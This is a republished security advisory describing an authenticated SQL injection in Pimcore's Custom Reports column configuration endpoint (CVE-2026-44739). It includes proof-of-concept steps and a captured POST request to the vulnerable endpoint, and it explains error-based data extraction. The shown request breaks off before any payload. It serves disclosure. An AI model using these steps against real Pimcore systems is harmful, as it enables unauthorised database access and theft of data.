CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

GHSA-3234-gxc3-pq6f: Pimcore Vulnerable to SQL Injection in Custom Reports Column Configuration

highCVSS 8.7CVE-2026-44739
Summary The columnConfigAction endpoint in the CustomReportsBundle is vulnerable to SQL injection. An attacker with the reports_config permission can supply a malicious SQL configuration that is concatenated into a query and executed. Although the application attempts to filter certain DDL/DML keywords (like UPDATE, DELETE, DROP), it fails to prevent arbitrary SELECT queries, UNION statements, or the use of dangerous database functions. Furthermore, because the application returns database error messages in the JSON response, an attacker can easily exfiltrate data using error-based SQL injection techniques. Affected scope bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php CustomReportController:columnConfigAction -> SqlAdapter::getColumns -> SqlAdapter::buildQueryString -> Db::fetchAssociative() PoC - Download and install the version Pimcore <=12.3.3 (latest) - Login using Admin account or any account that has reports_config permission - Navigate to custom reports - Capture the request using burp suite and perform SQLi attack as the following 1. Get Database username POST /admin/bundle/customreports/custom-report/column-config HTTP/1.1 Host: localhost Content-Length: 310 sec-ch-ua-platform: "Linux" Accept-Language: en-US,en;q=0.9 sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142" sec-ch-ua-mobile: ?0 X-pimcore-extjs-version-minor: 0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 X-pimcore-csrf-token: 2e42012c8310823bbdbce1598bdecfd19cb5e9c4 X-pimcore-extjs-version-major: 7 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/admin/ Accept-Encoding: gzip, deflate, br Cookie: pimcore_admin_auth_profile_token=9f990b; PHPSESSID=d101f6fce4d87b8bdbbe800f9f50c82a; _pc_vis=3a17250fba52c657; _pc_ses=177489

Details

Source
GitHub Security Advisories (INTL · database · site)
Severity
high — CVSS 8.7
Published
2026-05-27
Last updated
2026-07-10
Exploitation
Not in CISA KEV at last sync

Original advisory: https://github.com/advisories/GHSA-3234-gxc3-pq6f

Referenced CVEs

CVECSIRTS overviewExternal
CVE-2026-44739coverage & exploitation statusNVD · CVE.org

More from GitHub Security Advisories